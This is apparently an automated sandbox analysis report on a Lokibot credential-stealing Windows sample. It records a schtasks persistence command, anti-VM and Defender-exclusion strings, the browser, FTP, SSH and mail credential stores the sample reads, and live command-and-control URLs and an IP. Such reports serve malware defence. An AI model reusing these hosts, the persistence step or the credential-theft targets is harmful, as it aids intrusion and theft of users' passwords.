                Source: unknown | Process created: C:\Users\user\Desktop\2CW1YLhNIS.exe 'C:\Users\user\Desktop\2CW1YLhNIS.exe'
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UieOsrSocP' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D57.tmp'
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Process created: C:\Users\user\Desktop\2CW1YLhNIS.exe C:\Users\user\Desktop\2CW1YLhNIS.exe
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UieOsrSocP' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D57.tmp'
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Process created: C:\Users\user\Desktop\2CW1YLhNIS.exe C:\Users\user\Desktop\2CW1YLhNIS.exe
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                Source: 2CW1YLhNIS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 2CW1YLhNIS.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                Source: 2CW1YLhNIS.exe | Static file information: File size 1219072 > 1048576
                Source: 2CW1YLhNIS.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x117a00
                Source: 2CW1YLhNIS.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                Data Obfuscation:

                .NET source code contains potential unpacker
                Source: 2CW1YLhNIS.exe, u0006u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: UieOsrSocP.exe.0.dr, u0006u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.2.2CW1YLhNIS.exe.8f0000.0.unpack, u0006u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.0.2CW1YLhNIS.exe.8f0000.0.unpack, u0006u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 4.2.2CW1YLhNIS.exe.c90000.1.unpack, u0006u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 4.0.2CW1YLhNIS.exe.c90000.0.unpack, u0006u2000.cs | .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Yara detected aPLib compressed binary
                Source: Yara match | File source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: 2CW1YLhNIS.exe PID: 6172, type: MEMORY
                Source: Yara match | File source: Process Memory Space: 2CW1YLhNIS.exe PID: 5768, type: MEMORY
                Source: Yara match | File source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.2CW1YLhNIS.exe.3de0b28.4.unpack, type: UNPACKEDPE
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: 0_2_008F63F7 push 00000028h; retf 0000h 0_2_008F661B
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: 0_2_02B7043B pushad ; iretd 0_2_02B70442
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: 0_2_05FA79DB push dword ptr [edx-04h]; iretd 0_2_05FA79E9
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: 4_2_00402AC0 push eax; ret 4_2_00402AD4
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: 4_2_00402AC0 push eax; ret 4_2_00402AFC
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: 4_2_00C963F7 push 00000028h; retf 0000h 4_2_00C9661B
                Source: initial sample | Static PE information: section name: .text entropy: 7.17424045556
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | File created: C:\Users\user\AppData\Roaming\UieOsrSocP.exe

                Boot Survival:

                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UieOsrSocP' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D57.tmp'
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Process information set: NOOPENFILEERRORBOX (38 identical entries)
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Process information set: NOGPFAULTERRORBOX (115 identical entries)

                Malware Analysis System Evasion:

                Yara detected AntiVM3
                Source: Yara match | File source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: 2CW1YLhNIS.exe PID: 5768, type: MEMORY
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe TID: 6000 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe TID: 5940 | Thread sleep time: -43657s >= -30000s
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe TID: 4460 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe TID: 1644 | Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: 4_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 4_2_00403D74
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Thread delayed: delay time: 43657
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Thread delayed: delay time: 60000
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: vmware
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: VMWARE
                Source: 2CW1YLhNIS.exe, 00000000.00000002.648822995.000000000113F000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: 4_2_0040317B mov eax, dword ptr fs:[00000030h] 4_2_0040317B
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: 4_2_00402B7C GetProcessHeap,RtlAllocateHeap, 4_2_00402B7C
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Memory written: C:\Users\user\Desktop\2CW1YLhNIS.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UieOsrSocP' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D57.tmp'
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Process created: C:\Users\user\Desktop\2CW1YLhNIS.exe C:\Users\user\Desktop\2CW1YLhNIS.exe
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Queries volume information: C:\Users\user\Desktop\2CW1YLhNIS.exe VolumeInformation
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: 4_2_00406069 GetUserNameW
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match | File source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 2CW1YLhNIS.exe PID: 6172, type: MEMORY
Source: Yara match | File source: Process Memory Space: 2CW1YLhNIS.exe PID: 5768, type: MEMORY
Source: Yara match | File source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to steal Mail credentials (via file registry)
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: PopPassword 4_2_0040D069
Source: C:\Users\user\Desktop\2CW1YLhNIS.exe | Code function: SmtpPassword 4_2_0040D069
Source: Yara match | File source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 2CW1YLhNIS.exe PID: 6172, type: MEMORY
Source: Yara match | File source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scheduled Task/Job1 | Scheduled Task/Job1 | Access Token Manipulation1 | Disable or Modify Tools1 | OS Credential Dumping2 | Account Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection111 | Deobfuscate/Decode Files or Information1 | Input Capture1 | File and Directory Discovery2 | Remote Desktop Protocol | Data from Local System2 | Exfiltration Over Bluetooth | Encrypted Channel1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Scheduled Task/Job1 | Obfuscated Files or Information4 | Credentials in Registry2 | System Information Discovery13 | SMB/Windows Admin Shares | Email Collection1 | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing11 | NTDS | Security Software Discovery231 | Distributed Component Object Model | Input Capture1 | Scheduled Transfer | Application Layer Protocol112 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading1 | LSA Secrets | Process Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion41 | Cached Domain Credentials | Virtualization/Sandbox Evasion41 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation1 | DCSync | System Owner/User Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection111 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                Behavior Graph


                Screenshots


                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

Source | Detection | Scanner | Label
2CW1YLhNIS.exe | 26% | ReversingLabs | Win32.Trojan.Pwsx
2CW1YLhNIS.exe | 100% | Avira | HEUR/AGEN.1142734

                Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\UieOsrSocP.exe | 100% | Avira | HEUR/AGEN.1142734
C:\Users\user\AppData\Roaming\UieOsrSocP.exe | 26% | ReversingLabs | Win32.Trojan.Pwsx

                Unpacked PE Files

Source | Detection | Scanner | Label
0.2.2CW1YLhNIS.exe.3de0b28.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.2.2CW1YLhNIS.exe.c90000.1.unpack | 100% | Avira | HEUR/AGEN.1142734
4.2.2CW1YLhNIS.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.2CW1YLhNIS.exe.8f0000.0.unpack | 100% | Avira | HEUR/AGEN.1142734
0.0.2CW1YLhNIS.exe.8f0000.0.unpack | 100% | Avira | HEUR/AGEN.1142734
4.0.2CW1YLhNIS.exe.c90000.0.unpack | 100% | Avira | HEUR/AGEN.1142734

                Domains

                No Antivirus matches

                URLs

Source | Detection | Scanner | Label
http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe
http://63.141.228.141/32.php/QQojJUjm8ByeT | 0% | Avira URL Cloud | safe
http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe
http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe
http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe
http://www.ibsensoftware.com/ | 0% | URL Reputation | safe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
http://63.141.228.141/32.php/QQojJUjm8ByeT | true | Avira URL Cloud: safe | unknown
http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown

                URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 2CW1YLhNIS.exe, 00000000.00000002.649270975.0000000002D11000.00000004.00000001.sdmp | false | | high
http://www.ibsensoftware.com/ | 2CW1YLhNIS.exe, 2CW1YLhNIS.exe, 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp | false | | high

                    Contacted IPs


                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
63.141.228.141 | unknown | United States | 33387 | NOCIXUS | true

                    General Information

                    Joe Sandbox Version:32.0.0 Black Diamond
                    Analysis ID:438541
                    Start date:22.06.2021
                    Start time:18:22:18
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 6m 12s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:2CW1YLhNIS (renamed file extension from none to exe)
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@6/6@0/1
                    EGA Information:Failed
                    HDC Information:
                    • Successful, ratio: 72.8% (good quality ratio 69.9%)
                    • Quality average: 76.9%
                    • Quality standard deviation: 28.6%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 89
                    • Number of non-executed functions: 29
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Stop behavior analysis, all processes terminated
                    Warnings:
• Exclude process from analysis (whitelisted): svchost.exe
• Not all processes were analyzed; the report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/438541/sample/2CW1YLhNIS.exe

                    Simulations

                    Behavior and APIs

Time | Type | Description
18:23:04 | API Interceptor | 2x Sleep call for process: 2CW1YLhNIS.exe modified

                    Joe Sandbox View / Context

                    IPs

Match: 63.141.228.141
Associated Sample Name / URL | Detection | Context
scanbuild-pdf.exe | malicious | 63.141.228.141/32.php/hVjgJl5jKemRQ
proformapdf.exe | malicious | 63.141.228.141/32.php/hVjgJl5jKemRQ
PEMBAYARAN COPY TT_PDF.exe | malicious | 63.141.228.141/32.php/fn1ToJTMzu3Td
YNNRmYhVl9.exe | malicious | 63.141.228.141/32.php/S4wFP8QBww9Tp
nueva cotizaci#U00f3n.PDF.bat.exe | malicious | 63.141.228.141/32.php/a1NQk98eWCWX2
Confirmation Note.exe | malicious | 63.141.228.141/32.php/5mGrB9x77E21g
Iywwij0cboJSMRU.exe | malicious | 63.141.228.141/32.php/nGBv5iZqdfzrl
SecuriteInfo.com.Trojan.Win32.Save.a.1333.exe | malicious | 63.141.228.141/32.php/3LJAZguIGMmJV
o8jhgzsjD1jQsHo.exe | malicious | 63.141.228.141/32.php/nGBv5iZqdfzrl
Purchase Order-020POR040557 (2).exe | malicious | 63.141.228.141/32.php/DoGLQLrii1o27
HSBCpayment_advice.pdf.exe | malicious | 63.141.228.141/32.php/5l0ZnNa7AB6Dl
SCAN files.exe | malicious | 63.141.228.141/32.php/3LJAZguIGMmJV
pdf.zip.exe | malicious | 63.141.228.141/32.php/YjfkU88ZV6lc0
fW8OKRxAMYlXtGW.exe | malicious | 63.141.228.141/32.php/nGBv5iZqdfzrl
pdf.zip.exe | malicious | 63.141.228.141/32.php/YjfkU88ZV6lc0
RFQ For June 2021.exe | malicious | 63.141.228.141/32.php/fhAq3ugeI7NI8
MqaRnuUlL4etOtz.exe | malicious | 63.141.228.141/32.php/nGBv5iZqdfzrl
Purchase Order-020POR040557 (2).exe | malicious | 63.141.228.141/32.php/vkuep8Jt3rHQ5
BtLe7XbewiWhuoD.exe | malicious | 63.141.228.141/32.php/8400chmGujESe
V8tgawp0z3hIiWB.exe | malicious | 63.141.228.141/32.php/qB0GQ2GKLyuOU

                    Domains

                    No context

                    ASN

Match: NOCIXUS
Associated Sample Name / URL | Detection | Context
scanbuild-pdf.exe | malicious | 63.141.228.141
proformapdf.exe | malicious | 63.141.228.141
PEMBAYARAN COPY TT_PDF.exe | malicious | 63.141.228.141
YNNRmYhVl9.exe | malicious | 63.141.228.141
nueva cotizaci#U00f3n.PDF.bat.exe | malicious | 63.141.228.141
Confirmation Note.exe | malicious | 63.141.228.141
Iywwij0cboJSMRU.exe | malicious | 63.141.228.141
SecuriteInfo.com.Trojan.Win32.Save.a.1333.exe | malicious | 63.141.228.141
o8jhgzsjD1jQsHo.exe | malicious | 63.141.228.141
Purchase Order-020POR040557 (2).exe | malicious | 63.141.228.141
HSBCpayment_advice.pdf.exe | malicious | 63.141.228.141
SCAN files.exe | malicious | 63.141.228.141
pdf.zip.exe | malicious | 63.141.228.141
fW8OKRxAMYlXtGW.exe | malicious | 63.141.228.141
pdf.zip.exe | malicious | 63.141.228.141
RFQ For June 2021.exe | malicious | 63.141.228.141
MqaRnuUlL4etOtz.exe | malicious | 63.141.228.141
Purchase Order-020POR040557 (2).exe | malicious | 63.141.228.141
BtLe7XbewiWhuoD.exe | malicious | 63.141.228.141
V8tgawp0z3hIiWB.exe | malicious | 63.141.228.141

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2CW1YLhNIS.exe.log
                    Process:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):1314
                    Entropy (8bit):5.350128552078965
                    Encrypted:false
                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                    MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                    SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                    SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                    SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                    C:\Users\user\AppData\Local\Temp\tmp9D57.tmp
                    Process:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):1643
                    Entropy (8bit):5.171209003004209
                    Encrypted:false
                    SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGWtn:cbhK79lNQR/rydbz9I3YODOLNdq3/
                    MD5:C923D89D6474FE393E213E4D1A3090E4
                    SHA1:AA1DC430A3DA6B691E97DC55B2F8E5BBC68B2826
                    SHA-256:483F5360FA7519AF97EBB641E91ED9014A62693F1014540C85A0A5FDA6E3EC3F
